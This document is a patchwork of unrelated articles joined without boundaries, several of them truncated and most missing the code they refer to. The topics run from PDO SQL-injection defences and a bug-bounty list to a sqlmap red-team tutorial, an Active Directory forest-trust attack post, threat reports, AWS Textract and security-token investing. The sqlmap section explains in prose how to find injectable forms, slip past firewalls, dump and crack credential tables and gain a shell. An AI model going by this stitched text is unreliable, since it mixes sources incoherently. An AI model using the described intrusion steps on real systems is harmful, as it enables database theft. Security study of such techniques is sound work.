使用pdo的预处理方式可以避免sql注入。

在php手册中'PDO--预处理语句与存储过程'下的说明：

很多更成熟的数据库都支持预处理语句的概念。什么是预处理语句？可以把它看作是想要运行的 SQL 的一种编译过的模板，它可以使用变量参数进行定制。预处理语句可以带来两大好处：

查询仅需解析（或预处理）一次，但可以用相同或不同的参数执行多次。当查询准备好后，数据库将分析、编译和优化执行该查询的计划。对于复杂的查询，此过程要花费较长的时间，如果需要以不同参数多次重复相同的查询，那么该过程将大大降低应用程序的速度。通过使用预处理语句，可以避免重复分析/编译/优化周 期。 简言之，预处理语句占用更少的资源，因而运行得更快。

提供给预处理语句的参数不需要用引号括起来，驱动程序会自动处理。 如果应用程序只使用预处理语句，可以确保不会发生SQL 注入。 （然而，如果查询的其他部分是由未转义的输入来构建的，则仍存在 SQL 注入的风险）。

预处理语句如此有用，以至于它们唯一的特性是在驱动程序不支持的时PDO 将模拟处理。这样可以确保不管数据库是否具有这样的功能，都可以确保应用程序可以用相同的数据访问模式。

下边分别说明一下上述两点好处：

1.首先说说mysql的存储过程，mysql5中引入了存储过程特性，存储过程创建的时候，数据库已经对其进行了一次解析和优化。其次，存储过程一旦执行，在内存中就会保留一份这个存储过程，这样下次再执行同样的存储过程时，可以从内存中直接中读取。mysql存储过程的使用可以参看：http://maoyifa100.iteye.com/blog/1900305

对于PDO，原理和其相同，只是PDO支持EMULATE_PREPARES（模拟预处理）方式，是在本地由PDO驱动完成，同时也可以不使用本地的模拟预处理，交由mysql完成，下边会对这两种情况进行说明。

2.防止sql注入，我通过tcpdump和wireshark结合抓包来分析一下。

在虚拟机上执行一段代码，对远端mysql发起请求：

通过tcpdump抓包生成文件：

通过wireshark打开文件：

可以看到整个过程：3次握手--Login Request--Request Query--Request Quit

查看Request Query包可以看到：

咦？这不也是拼接sql语句么？

其实，这与我们平时使用mysql_real_escape_string将字符串进行转义，再拼接成SQL语句没有差别，只是由PDO本地驱动完成转义的（EMULATE_PREPARES）

这种情况下还是有可能造成SQL 注入的，也就是说在php本地调用pdo prepare中的mysql_real_escape_string来操作query，使用的是本地单字节字符集，而我们传递多字节编码的变量时，有可能还是会造成SQL注入漏洞（php 5.3.6以前版本的问题之一，这也就解释了为何在使用PDO时，建议升级到php 5.3.6+，并在DSN字符串中指定charset的原因）。

针对php 5.3.6以前版本，以下代码仍然可能造成SQL注入问题：

而正确的转义应该是给mysql Server指定字符集，并将变量发送给MySQL Server完成根据字符转义。

那么，如何才能禁止PHP本地转义而交由MySQL Server转义呢？

PDO有一项参数，名为PDO::ATTR_EMULATE_PREPARES ，表示是否使用PHP本地模拟prepare，此项参数默认true,我们改为false后再抓包看看。

先在代码第一行后添加

再次用tcpdump抓包，通过wireshark我们可以看到：

php对sql语句发送采用了prepare--execute方式

这次的变量转义处理交由mysql server来执行。

既然变量和SQL模板是分两次发送的，那么就不存在SQL注入的问题了，但明显会多一次传输，这在php5.3.6之后是不需要的。

1. php升级到5.3.6+，生产环境强烈建议升级到php 5.3.9+ php 5.4+，php 5.3.8存在致命的hash碰撞漏洞。

2. 若使用php 5.3.6+, 请在在PDO的DSN中指定charset属性。小于5.3.6 : $dbh = new PDO($dsn,$user,$pass,array(PDO::MYSQL_ATTR_INIT_COMMAND => "set names utf8"));

3. 如果使用了PHP 5.3.6及以前版本，设置PDO::ATTR_EMULATE_PREPARES参数为false（即由MySQL server进行变量处理），php 5.3.6以上版本已经处理了这个问题，无论是使用本地模拟prepare还是调用mysql server的prepare均可。

4. 如果使用了PHP 5.3.6及以前版本, 因Yii框架默认并未设置ATTR_EMULATE_PREPARES的值，请在数据库配置文件中指定emulatePrepare的值为false。

1. 为什么在DSN中指定了charset, 还需要执行set names 呢？

其实set names 有两个作用：

告诉mysql server, 客户端（PHP程序）提交给它的编码是什么

告诉mysql server, 客户端需要的结果的编码是什么

也就是说，如果数据表使用gbk字符集，而PHP程序使用UTF-8编码，我们在执行查询前运行set names utf8, 告诉mysql server正确编码即可，无须在程序中编码转换。这样我们以utf-8编码提交查询到mysql server, 得到的结果也会是utf-8编码。省却了程序中的转换编码问题，不要有疑问，这样做不会产生乱码。

那么在DSN中指定charset的作用是什么? 只是告诉PDO, 本地驱动转义时使用指定的字符集（并不是设定mysql server通信字符集），设置mysql server通信字符集，还得使用set names 指令。

2. PDO::ATTR_EMULATE_PREPARES属性设置为false引发的血案: http://my.oschina.net/u/437615/blog/369481

转自：https://www.cnblogs.com/leezhxing/p/5282437.html

A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty

I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea how to exploit. Let say you found a RPO (Relativce Path Overwrite) in a website, but you have no idea how should you exploit that, then the perfect place to go would be here . Or you have found your customer is using oauth mechanism but you have no idea how should we test it, the other perfect place to go would be here

My intention is to make a full and complete list of common vulnerability that are publicly disclosed bug bounty write-up, and let Bug Bounty Hunter to use this page as a reference when they want to gain some insight for a particular kind of vulnerability during Bug Hunting, feel free to submit pull request. Okay, enough for chit-chatting, let's get started.

Facebook Access Token Stolen by Jack Whitton -

Obtaining Login Tokens for an Outlook, Office or Azure Account by Jack Whitton

Bypassing Digits web authentication's host validation with HPP by filedescriptor

Bypass of redirect_uri validation with /../ in GitHub by Egor Homakov

Bypassing callback_url validation on Digits by filedescriptor

A group of university researchers from around the globe have teamed up to develop what they say is a powerful new tool to root out security flaws.

Known as AFLSmart, this fuzzing software is built on the powerful American Fuzzy Lop toolkit . We're told AFLSmart is pretty good at testing applications for common security flaws, such as buffer overflow errors, that can be targeted by attackers for denial of service or remote code execution exploits.

The researchers say that, on average, AFLSmart can detect twice as many bugs as AFL over a 24 hour period and, since it was put into use fuzzing a handful of open-source software libraries, the software has uncovered a total of 42 zero-day vulnerabilities and has banked 17 CVE-listed holes.

Fuzzing has long been used by security researchers as a way to automate the process of finding security vulnerabilities. By continually bombarding various input fields with strings of data, the tools can see where an application fails to properly handle the incoming data and could be vulnerable to exploitation.

AFLSmart, designed by teams from the National University of Singapore, Monash University in Australia, and University Politechnica of Bucharest, looks to expand the reach of common fuzzing tools by making them more versatile and able to cover a wider range of possible inputs.

The problem, says the team, is that most fuzzing tools move around an application slowly, changing individual bits and slowly hoping to come across a new input field. This makes automated fuzzing a slow and tedious process, particularly for multimedia libraries and tools that handle many types of data and formats.

"Finding vulnerabilities effectively in applications processing such widely used formats is of imminent need. Mutations of the bit-level file representation are unlikely to affect any structural changes on the file that are necessary to effectively explore the vast yet sparse domain of valid program inputs," the boffins write.

"More likely than not arbitrary bit-level mutations of a valid file will result in an invalid file that is rejected by the program’s parser before reaching the data processing portion of the program."

To solve this, the team set out to create a tool that is better able to look at the entire application and make high-level changes to the code it uses to fuzz an application for possible vulnerabilities.

Where a traditional fuzzing tool moves around an application by changing one or two bits to look for a new input field, AFLSmart tries to look at the entire input format. For example, the codeg would see that an application handles both image and document files, and create seed files for both of those formats.

"Given an input format specification, our smart greybox fuzzer derives a structural representation of the seed file, called virtual structure, and leverages our novel smart mutation operators to modify the virtual file structure in addition to the file’s bit sequence during the generation of new input files," the researchers said.

"During the greybox fuzzing search, our tool AFLSmart measures the degree of validity of the inputs produced with respect to the file format specification. It prioritizes valid inputs over invalid ones, by enabling the fuzzer to explore more mutations of a valid file as opposed to an invalid one."

This technique has been found to nearly double the efficiency of the fuzzing tool.

Sponsored: Following Bottomline’s journey to the Hybrid Cloud

Welcome back to our series on red teams! Here, we’re explaining the tools and concepts behind the in-house organizations designed to test a company’s defenses. We started by introducing Kali linux , a foundational operating system for penetration testing.

Let’s take a fresh look at one of the many, many tools embedded in Kali Linux sqlmap. sqlmap is an important tool for penetration testers because it makes it easy to create SQL injection attacks, one of the primary techniques that attackers use to compromise databases.

SQL injection attacks work by exploiting vulnerable fields in inputs that are connected to databases. For example, an attacker might find a login form for your network , input SQL code instead of a username and password, and then retrieve the entire contents of your credential database. These vulnerabilities were discovered as early as 1998, and yet two decades later they still lead the OWASP Top 10 .

Sqlmap is valuable for red teams because it makes SQL injection easy. The application can handle everything from finding vulnerable fields to generating malicious SQL code, as well as everything in between. It can even help you export or delete data from a compromised database. Here’s how to get started.

One of the most useful parts of sqlmap is its ability to find vulnerable forms within a website automatically. For example, you can use sqlmap to run a simple “http get” command on your target domain while also specifying a kind of input form to look for. After receiving this command, sqlmap will crawl the target domain, find out if it is protected by firewalls , find injectable forms, identify the databases behind the forms, and then identify the specific commands that will unlock them.

If you’re worried about detection, you can also make this process more specific. For example, let’s say that you’ve used a different method to find a web page containing a vulnerable input Google dorking is a popular technique. Here, you can use sqlmap to interrogate the form directly and find out how many databases are linked to the vulnerable input, as well as what kind of database they are and what commands can manipulate them.

Sqlmap stores the data it learns about websites. To obtain information about a vulnerable site that you mapped using the “http get” command, all you need to do is target sqlmap at that site once again, this time appending the “tables” command.

This will give you the name of each table stored within the databases behind a vulnerable input. For instance, you might find a table called “users,” or “accounts,” or “credentials.” These are all databases that a hacker or a red team member would be very interested to examine.

To find the contents of a table, extend your command with “-T” plus the name of the table you’re interested in for example “-T accounts.” Adding the “ dump” command will cause sqlmap to export all the data you’ve found and save it in an Excel file for your perusal.

Congratulations! The file you found is full of passwords but they’re hashed. No matter. You can certainly use a dedicated hash cracking tool to unscramble the passwords, but sqlmap has a built-in hash cracking tool if you’re impatient. Feel like there’s more information deeper into the network? You can even use sqlmap to get shell, meaning that you can insert data into the table.

(WARNING: unless you are very confident in your skills as a red team member, you should probably stop once you have shell without inserting anything as chances are good that you could delete or corrupt the database entirely).

It is absolutely unnerving to consider how easy it is to use a free tool like sqlmap to penetrate websites. With no special skills, and using only the advice found on online tutorials, a relatively-unskilled attacker can do real damage to an undefended business .

As you’ll notice, however, the power of this tool (and others like it) all starts with its ability to map sites. Point it at a URL and off it goes, with options that give it a good chance of avoiding web application firewalls .

!

最近，网络安全公司Sophos发布了一个深度调研报告，对接下来2019年将出现的网络威胁向互联网用户和企业做出预警。下面是报告所提到的部分主要威胁：

和传统“广撒网式”发送海量恶意邮件不同，这种勒索软件的攻击是“交互式”的，发布者不再是机器，其背后的人类攻击者会主动发掘和监测目标，并根据情况调整策略，受害者不交钱不罢休。

2018年见证了定向勒索攻击软件的发展，如WannaCry、Dhrma和SamSam，网络犯罪者藉此已获利上百万美元。Sophos的安全专家认为，这种经济上的成功将大大刺激同类网络攻击的出现，并且会在2019年频繁发生。

如果不进行充分的渗透测试，提高数据安全的等级，那么勒索软件在接下来的一年将造成深远的影响。

随着更多设备加入了物联网，网络攻击者开始扩大他们的攻击范围和工具。如非法安卓软件数量的增加，让勒索软件将注意力转向了移动电话、平板电脑和其他智能设备。而随着家庭和企业拥有越来越多可联网设备，犯罪者开始发明新的手段劫持这些设备作为巨型僵尸网络的节点，如Mirai Aidra、Wifatc和Gafgyt。2018年，VPNfilter证明了武器化的物联网对嵌入式系统和网络设备的巨大破坏力。

一系列事件连续发生时，黑客会在其中一个节点渗入系统。由于一系列连续发生的事件没有清晰可见的脉络，因此在很多时候，想搞清楚黑客将在何时给出一击是不可能的。

虽然微软在1年前便发布了补丁来处理永恒之蓝的漏洞问题，但它依然是网络犯罪者的“心头好”。Sophos称，永恒之蓝漏洞和挖矿软件的致命结合会造成损害。

对于中小型企业而言，想要完全规避这些安全威胁随便比较困难，但依然可以合理避免，如建立健全的安全防御机制、使用正规有效的安全防御软件、规范系统管理者的权限、谨慎对待陌生或可疑的邮件、规范密码的使用、不重复使用密码、及时更新漏洞补丁等。当然，更省事的方法是选用可信任的安全服务公司创建更具有针对性、更全面的安全解决方案。

编译：创宇小刘，编译自外网新闻及 Sophos报告

声明：本文来自HackerNews，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。

根据研究公司Coleman Parkes从全球1000家机构采样得来的数据，2018年间，77%的机构遭受了至少一次基于DNS的网络攻击。调查采样的企业，涵盖了活跃于通信、教育、金融、医疗保健、服务、运输、制造、公共、以及零售事业的组织机构。在全球范围五大基于DNS的攻击中，恶意软件和网络钓鱼占据了榜单前二的位置;而域名锁定、DNS隧道与DDoS攻击，也造成了极大的影响。

2017~2018年间，DNS攻击导致的损失，已增加57%。

EfficientIP在《2018 DNS威胁报告》中写到：“思科2016安全报告发现，91%的恶意软件利用了域名解析服务(DNS)。它们壳借助DNS这个载体(DoS放大或CnC服务器通信)，对目标、甚至DNS服务器发起攻击”。

2017年的时候，网络钓鱼甚至不是最常遇到的五种基于DNS的攻击类型。但2018年间，欺诈者已经大量通过定向和定制活动，来提升针对特定行业部门的网络钓鱼受害率。

通过分析调查期间收集到的数据，Coleman Parkes发现：不法分子已将基于DNS的攻击，作为一种相当有效的工具，可对其行业目标造成广泛的品牌和财务损失、产生短期和长期的影响。

受DNS攻击所影响的组织，平均损失较上一年增加约57%――从2017年的45.6万美元，到了2018年的71.5万美元――这一点尤其令人感到不安。

考虑到所有因素，虽然DNS攻击从一个行业部门、转到另一个行业部门的影响差异很大。但对所有组织机构来说，部署恰当的DNS攻击检测和防护措施，仍然是至关重要的。

For years Microsoft has stated that the forest was the security boundary in Active Directory. For example, Microsoft’s “ What Are Domains and Forests? ” document (last updated in 2014) has a “ Forests as Security Boundaries ” section which states (emphasis added):

Each forest is a single instance of the directory, the top-level Active Directory container, and a security boundary for all objects that are located in the forest. This security boundary defines the scope of authority of the administrators. In general, a security boundary is defined by the top-level container for which no administrator external to the container can take control away from administrators within the container. As shown in the following figure, no administrators from outside a forest can control access to information inside the forest unless first given permission to do so by the administrators within the forest.

Unfortunately, this is not the case. The forest is no longer a security boundary.

By applying the MS-RPRN abuse issue (previously reported to Microsoft Security Response Center by my workmate Lee Christensen ) with various trust scenarios, we determined that administrators from one forest can in fact compromise resources in a forest that it shares a two-way interforest trust with. For more information on Lee’s MS-RPRN abuse (a legacy printer protocol “feature”) check out the DerbyCon 2018 “ The Unintended Risks of Trusting Active Directory ” presentation that my workmates @tifkin_ , @enigma0x3 , and myself gave this year. For more background on trusts, check out my “ Guide to Attacking Domain Trusts ” from last year.

The tl;dr non-technical explanation of “Why Care?” is that if your organization has a two-way forest trust (possibly ‘external’ trusts as well, more on that later) with another Active Directory forest, and if an attacker can compromise a single machine with unconstrained delegation (e.g. a domain controller) in that foreign forest, then they can leverage this to compromise your forest and every domain within it. In our opinion, this is very bad.

The tl;dr technical explanation is due to several default Active Directory forest configurations (detailed in the “ Attack Explanation ” section below) an attacker who compromises a domain controller in a forest (or any server with unconstrained delegation in said forest) can coerce domain controllers in foreign forests to authenticate to the attacker-controlled server through “ the printer bug. ” Due to various delegation settings, the foreign domain controller’s ticket-granting-ticket (TGT) can be extracted on the attacker-controlled server, reapplied, and used to compromise the credential material in the foreign forest.

This issue was reported to Microsoft’s Security Response center, and the associated teams determined that this was an issue best resolved via v.Next, meaning it may be fixed in a future version of windows. There is more detail concerning their response and my subsequent thoughts in the “ Microsoft’s Response and My Thoughts ” section at the bottom of this post. Also later in the post is mitigation guidance, and my teammate Roberto Rodriquez has a defensive post on complete detective guidance titled “ Hunting in Active Directory: Unconstrained Delegation & Forests Trusts “.

There are four main “features” in a default Active Forest installation that allow this attack to happen.

Combined together, this means that if FORESTA has a two way interforest trust with FORESTB, then the compromise of any domain controller (or any server with unconstrained delegation) in FORESTB can be leveraged to compromise the FORESTA forest root (or vice versa) and all domains within it!

To execute this attack (using currently public tools) an attacker would:

Here’s a diagram of what’s happening:

Kind of make sense? How about seeing the attack work in action.

The following screenshots show compromising FORESTA.LOCAL from the domain controller DCB.FORESTB.LOCAL :

The following screenshot shows compromising FORESTB.LOCAL from the domain controller DCA.FORESTA.LOCAL :

Or check out this demonstration video of the entire attack.

This attack also provides an alternative way to escalate from a child domain to the root domain within the same forest , similar to the abuse of sidHistory in Golden Tickets discovered by Sean Metcalf and Benjamin Delpy in 2015. However, as the forest is specified as the trust boundary, this is not quite as interesting as the compromise of interforest trusts that this new attack entails.

Again, as a tl;dr the compromise of any server with unconstrained delegation (domain controller or otherwise) can not only be leveraged to compromise the current domain and/or any domains in the current forest, but also any/all domains in any foreign forest the current forest shares a two-way forest trust with!

As we stated previously, in our opinion this is very very bad. Why? This attack works with default, modern configurations for Active Directory forests as long as a two-way forest trust is in place. Also, as mentioned, this attack works from any system with unconstrained delegation enabled, not just domain controllers. Imagine this scenario:

So what if SuperMegaCorp (or HotStartup ) performed proper network segmentation and the development server is restricted from talking to machines outside its development subdomain? Well, domain controllers have to be able to talk to each other for replication to occur. The attacker could use the unconstrained dev server compromise to compromise the development subdomain via the attack, perform the attack again to hop from the development subdomain domain controller to the production domain controller, and perform the attack a third time to compromise SuperMegaCorp ‘s forest. This is marginally better than no segmentation, as it forces an attacker to log onto various domain controllers to perform the attack (instead of from ANY unconstrained server) but the attack chain is still feasible.

Like we stated, we believe this is bad.

We tested the one-way interforest trust scenario, where FORESTB.LOCAL trusts > FORESTA.LOCAL, but we were unable to get the attack working in either direction (FORESTA to FORESTB nor FORESTB to FORESTA).

AzSK ― Secure DevOps Kit for Azure, is a group of settings and scripts to analyze and improve the security of your Azure environments. It looks at six areas: Subscription Security, Security Verification Tests and IntelliSense, CI/CD Build/Release Extensions, Continuous Assurance Runbooks, OMS Solutions, and Cloud Risk Governance. In this article, I will focus on how to use AzSk to improve the security of your subscriptions.

To use AzSK, you first need a machine provisioned with windows and PowerShell ISE, which you can download here if you do not already have it available. In the open PowerShell ISE window, verify the version of PowerShell. (It needs to be 5.0 or higher.) To perform a check, run this command:

Now, with the machine ready to install AzSK, run the command below to install it for your user:

If you do not have NuGetProvider and PSGallery installed, the script will recommend it to you automatically. You will just need to Accept to move on. Once the installation is finished, a window will open with a sign-in form into Azure, complete with your credentials and confirmation of login. That’s it ― AzSK is correctly installed and ready to use.

Go to portal.azure.com, find “Subscriptions” and copy the subscription ID that will be used to analyze security levels. Then, in PowerShell ISE, type the command to start the check:

Agree with the privacy terms to continue. The process could take a while depending on your subscription’s size. When it’s finished, a log file will be created in the directory: C:\Users\IEUser\AppData\Local\Microsoft\AzSKLogs\Sub_VisualStudioEnterpriseBizSpark\TIMESTAMP_GSS. The name of the file is SecurityReport-TIMESTAMP.csv. This log contains found issues’ statuses, severity, descriptions, and recommendations.

In the PowerShell log, we can see the verifications and the total Passed and Failed results.

One of the recommendations listed in the CSV file suggests configuring the Azure Security Center (ASC). The Azure Security Center offers security management with the ability to create and apply security policies.

To set up the Azure Security Center, provide your contact data (email and phone number) by including it in the command below. In the email field, you can use a comma to separate email addresses.

In Azure Portal, access Subscriptions > ID_OF_SUBSCRIPTION > Policies and check that ASC Default policy is enabled.

Another suggested recommendation is to enable action alerts on the subscription’s security. To set up alerts, run the command below, and include the email address that will receive the notifications.

You will then receive an email confirming that the subscription was added to an Azure Monitor action group.

The removal of unused IP public addresses is also strongly recommended. Run the command below to list all of your public IPs.

The IP addresses ready to be removed have a “Not Assigned” label in the IP number column. But this status does not reflect the association with the network interface. If the IP address was associated with the network interface, it will be shown as “Not Assigned,” but deletion of the IP address will not be allowed until you disassociate it.

To remove an IP address, run the command above, filling the name of the IP address and the resource group. It will show a confirmation prompt, asking if you are sure you want to delete the public IP. Be alert, because this operation cannot be undone.

The effort to apply these security recommendations is worth it to help ensure a secure and healthy environment. What you choose to do with the recommendations is up to you, but with the critical importance of good security, the maximum you can do is considered a good start ― so take advantage of the six areas offered by AzSK to help secure your subscriptions.

A massive team of security companies and federal agencies worked together to shut down an enormous click fraud operation. Although 3ve, pronounced Eve, started as a small botnet, by the time it was sinkholed, it was using 1.7 million infected computers to falsify billions of ad views, which resulted in businesses paying over $29 million for ads that no real human internet users ever saw.

A Google-released whitepaper (pdf) revealed that “3ve generated between 3 billion and 12 billion or more daily ad bid requests at its peak.” When announcing the unsealing of a 13-count indictment against eight defendants, the Department of Justice said the FBI took control of 31 domains and took information from 89 servers that were part of the botnet infrastructure engaged in digital advertising fraud activity.

US-CERT published a technical alert about the malware associated with 3ve , Boaxxe/Miuref ― dubbed Methbot in the WhiteOps paper ― and Kovter malware, as well as potential solutions proposed by the FBI and Department of Homeland Security (DHS). If you believe you were a victim of the malware or hijacked IPs, you are urged to submit a complaint to www.ic3.gov using the hashtag of #3ve in your complaint.

The FBI created a fake FedEx website and deployed a Network Investigative Technique (NIT) after a failed attempt to learn the real IP address of cyber criminals. The fake FedEx page, according to Motherboard , would deliver the message Access Denied when the crooks tried to access it from behind proxies. The FBI then booby-trapped a Microsoft Word document that required the target to exit “protected mode” in order for an embedded image to connect to an FBI server to reveal where the criminal was located.

Researchers from Trend Micro and Kochava warned of bad apps on Google Play. Kochava said, “Eight apps with a total of more than 2 billion downloads in the Google Play store have been exploiting user permissions as part of an ad fraud scheme that could have stolen millions of dollars.” Trend Micro identified seven Android apps in Google Play with FraudBot instances.

Researchers at Confiant revealed a monster of an iOS malvertising campaign that is estimated to have racked up 300 million impressions in a 48-hour period. The targeted iOS devices, mostly in the U.S., were forcefully redirected to “fake ‘you’ve won a gift card’ or adult content landing pages.” The pages usually attempted to phish visitor data for affiliate marketing-related fraud or to steal personal identification data. “The session is hijacked without user interaction,” the researchers said.

Thanks to a dreaded third-party, a vendor used for billing services, hackers managed to get hold of the personal information of 2.65 million patients. AccuDoc Solutions, the third-party vendor, notified Atrium Health that an unauthorized third party accessed its databases. Atrium Health said the 2.65 million compromised patient records included “names, addresses, dates of birth, insurance policy information, medical record numbers, invoice numbers, account balances and dates of services. Atrium estimates about 700,000 of the exposed records may have also included Social Security numbers.”

Microsoft issued a security advisory warning of a fairly significant oops ― that two applications, Sennheiser HeadSetup and HeadSetup Pro, accidentally installed two root certificates on users’ PCs, thus allowing man-in-the-middle attacks. How very Superfish.

The advisory notified customers of “two inadvertently disclosed digital certificates that could be used to spoof content and to provide an update to the Certificate Trust List (CTL) to remove user-mode trust for the certificates. The disclosed root certificates were unrestricted and could be used to issue additional certificates for uses such as code signing and server authentication.”

Secorvo Security Consulting published a vulnerability report (pdf) and proof-of-concept code showing how easily an attacker could exploit it to extract private keys.

Microsoft updated the Certificate Trust List to remove user-mode for the certificates. Vulnerable customers with the software were advised to install an updated version of the HeadSetup and HeadSetup Pro applications.

One of the challenges just about every business faces is converting forms to a useful digital format. This has typicallyinvolved using human data entry clerks to enter the data into the computer. State of the art involved using OCR to read forms automatically, but AWS CEO Andy Jassy explained that OCR is basically just a dumb text reader. It doesn’t recognize text types. Amazon wanted to change that and today it announced Textract, an intelligent OCR tool to move data from forms to a more useable digital format.

In an example, he showed a form with tables. Regular OCR didn’t recognize the table and interpreted it as a string of text. Textract is designed to recognize common page elements like a table and pull the data in a sensible way.

Jassy said that forms also often change and if you are using a template as a work-around for OCR’s lack of intelligence, the template breaks if you move anything. To fix that, Textract is smart enough to understand common data types like social security numbers, dates of birth and addresses and it interprets them correctly no matter where they fall on the page.

“We have taught Textract to recognize this set of characters is a date of birth and this is a social security number. If forms change Textract won’t miss it,” Jassy explained

Granite Properties is not the sort of business that one usually thinks of as a prime target for hackers. The Plano, Texas-based commercial real estate firm doesn’t store or manage much personally identifiable information. But it does manage more than 30 buildings , and the data it protects helps keep people safe.

“We worry about hacking and we constantly look for potential vulnerabilities to protect against it,” explains Clint Osteen, Granite’s senior director of IT, who leads an IT team of seven .

It’s common for nonemployees to need access to its network, Osteen says, so Granite uses multifactor authentication to make sure anyone who gets onto the network is supposed to be there. It also put itself through a thorough, independent security audit during the first half of 2018, which gave Osteen’s team a comprehensive view of its entire network and equipment. The assessment, which reviewed everything down to the physical layer, showed him where the company’s defenses were weak, and what he could do to strengthen the entire network and infrastructure.

“The assessment included 30 to 40 sites . They plugged equipment into every single port to see what they could get to,” explains Osteen. “You’re never going to keep everyone out, so the best thing you can do when someone gets in is be aware of them and immediately lock them down.”

None of the results of the audit were surprising, and many of the problems it uncovered were simple to solve, such as updating firewalls and locking down ports to switches. But it underscored the importance of getting those easily overlooked items done, and deepened Granite’s understanding of its strengths and vulnerabilities.

“They were all things we put off because they were things that did not seem like a likely security vulnerability,” Osteen says. “They just kept dropping on the priority list, but over time it all accumulates.”

DOWNLOAD: When it comes to security, data informs effective action. Learn how to get it.

It’s common for security to get short shrift within busy IT departments, says Garrett Bekker, a principal security analyst at 451 Research. But the approach Granite took, especially its adoption of multifactor authentication, is one that more companies would be wise to consider, he argues.

“ We’re moving to the concept of zero trust ― assuming no one should be trusted,” Bekker says. “This means using authentication more broadly and authenticating users and machines more frequently.”

Bekker also suggests setting more limits on users and devices ― for example, restricting user-owned devices to read-only access. Networks also should be running scans to make sure devices have up-to-date operating systems and sanctioned software and services.

Kyle Randolph Senior Director for Security, Privacy and Compliance, Optimizely

“You might be scanning to see if a device is jailbroken or rooted. There is a whole class of companies that are offering services based on zero trust that can take security to the next level,” he says.

For Optimizely , a San Francisco based company that helps its customers to optimize its digital experiences, keeping data safe requires a multipronged approach.

Optimizely’s customers use its platform to do A/B testing, personalization, optimization and customization for e-commerce sites. The resulting customer data is proprietary and valuable ― which is why Optimizely takes its security controls so seriously.

“Our platform is used by large enterprise companies, so the stakes are high for us, which is why we mitigate risk at every stage,” says Kyle Randolph, the company’s senior director of security, privacy and compliance. “Software security is paramount because of the impact to a customer’s website that a javascript vulnerability can have. It’s a big ask of trust for us to deliver JavaScript and ask our customers to trust that the experience is going to be secure. At Optimizely, ensuring the integrity of JavaScript is a top security priority to mitigate the risk of a website compromise.”

The company runs its servers in the cloud, so it trusts its cloud providers to handle the physical and network security. However, the business logic security for its 400 employees , as well as the security for customers, falls under Randolph’s domain.

His work starts with plenty of automated tools and a security-first focus . Randolph and his team don’t overlook the basics, such as keeping software patched and updated, using firewalls and tapping security standards. But controlling the sign-on process is just as important, he says. “Here at Optimizely, we use dozens of cloud-based services. So, for us and for our customers, passwords are a big focus. Humans are bad at choosing passwords and at password hygiene. We use Okta single sign-on, so we can remove those worries across the board.”

When it comes to protecting data, IT should know what’s going on with the network, where company data resides and how well its current infrastructure and strategies are working.

JBG Smith , a real estate investment company based in Chevy Chase, Md., looked to this strategy to shore up its infrastructure. It needed a way to secure its properties and its tenants while allowing its many contractors and employees to access everything remotely. “Our issue was how to deliver a strong business experience while still delivering security,” says David Shanker, the company’s senior vice president of IT. “And that security had to be easy to use so it didn’t impact the user’s overall experience.”

The number of records exposed by reported data breaches since 2005.

Source: idtheftcenter.org/data-breaches Nov. 14, 2018

JBG Smith implemented what Shanker calls a “consolidated security platform,” focusing on using interoperable products and services. It uses Office 365 as well as Microsoft’s Intune for mobile device management, and multiple products from Palo Alto Networks . Cisco ’s two-factor authentication offering, from newly acquired Duo Security, rounds out the security platform.

Imagine being able to own.1% of a Picasso or a fourth of an Uber cab that you split with three of your friends. Currently, such things would be burdensome at best or just nearly impossible. However, security tokens offerings (STOs) are providing a path to fractional ownership by enabling the tokenization of virtually anything we can think of. Such offerings have been sweeping the cryptocurrency space, providing a regulated alternative to ICOs. Since security tokens are backed by underlying assets or profits, investors gain access to equity, voting rights, and dividends. In theory, this should allow anyone to invest into anything, opening the doors for unlimited opportunities never seen before. Yet in practice, there are quite a few obstacles one needs to be aware of before getting lost in the hype.

As ICOs became popular fundraising channels, utility tokens emerged. Many projects claimed that these tokens were an integral part of their products, however, most of them didn’t do much but help them raise capital. Since ICOs were never classified as securities, they managed to get around the regulations that are attached to most financial assets. While the regulations of STOs provide for safer waters, they also build a fence around the pool in the form of accreditation requirements. While Title III of the 2016 JOBS Act opened up equity crowd funding to retail investors, that access is still like a crack in a wall (for better or worse) compared to the freedom provided by most ICOs.

ICOs created an environment of evangelist hodlers that held coins through thick and thin and speculators that would make quick (and pretty sizable) profits by dumping their tokens as soon as they hit the market. This has been a rinse and repeat practice for many ICO investors. However, with STOs this isn’t the case. Investors can be subject to long lockup periods where they are unable to get rid of their assets. Such periods not only tie up capital, but also greatly increase exposure to price fluctuations and long-term success of the underlying asset.

Investors participating in ICOs are primarily moon hunters. Unfazed by the gains in the tradtional crypto market, they hunt for the unicorns that would 10 50x their potential profit. Doing so for ICOs that live on speculation (and not much else) is one thing. However, since the asset underlying STOs has a net asset value, it may act as an anchor on price. While assets like art and real estate tend to retain value and grow over time, realizing gains from such assets requires a much greater amount of what most ICO investors don’t have; patience.

While STOs aim at turn illiquid assets liquid, ironically, they also reduce the availability for exchange or trade. Being subject to many secondary-trading restrictions, the ability to sell off assets is far more difficult than getting rid of shares on an exchange. Nevertheless, licensed security exchange token platforms are coming and there are a few things we should look out for:

Ultimately, there is no denying that STOs will lead the path to a tokenized world. Yet like with anything, it is always a good idea to know exactly what you are getting into. While over time regulations are likely to become more relaxed, when that will be no one knows. Before diving head first into anything make sure to do your own research and have a coherent plan for getting in as well as out.

Daniel Elias is the Marketing Lead at Jibrel Network . Jibrel provides currencies, equities, commodities and other financial assets as standard ERC-20 tokens on the Ethereum blockchain

谁来为我的设备和应用安全负责?在当今日益严峻的威胁形势下，这是一个重要问题，但也是一个没有明确答案的问题。尽管对移动应用以及连接设备安全特性的需求有所增加，但没有关键参与者会承担这个责任，包括设备制造商、消费者、移动运营商或消费者通过设备与其进行交易的企业。

虽然这肯定也有问题，但也提供了一个通过将安全性引入平台，并将企业业务与竞争对手区分开来的机会。70%以上的最高层高管都非常重视数据隐私，66%的高管认为企业网络很容易受到黑客攻击。鉴于此，安全必须得到足够的重视和认可，而不仅仅是作为附加功能或高级功能;任何企业所有者都必须将其作为一个整体特性。

当安全性成为企业的核心组件时，会增强客户对企业的看法。事实上，安全本身也可以成为一个关键卖点，可以让客户远离竞争对手。特别是将安全作为基础架构一部分的初创公司，相比那些粉饰安全、或将安全作为不受支持的附加功能的各种规模的企业，更有竞争优势。

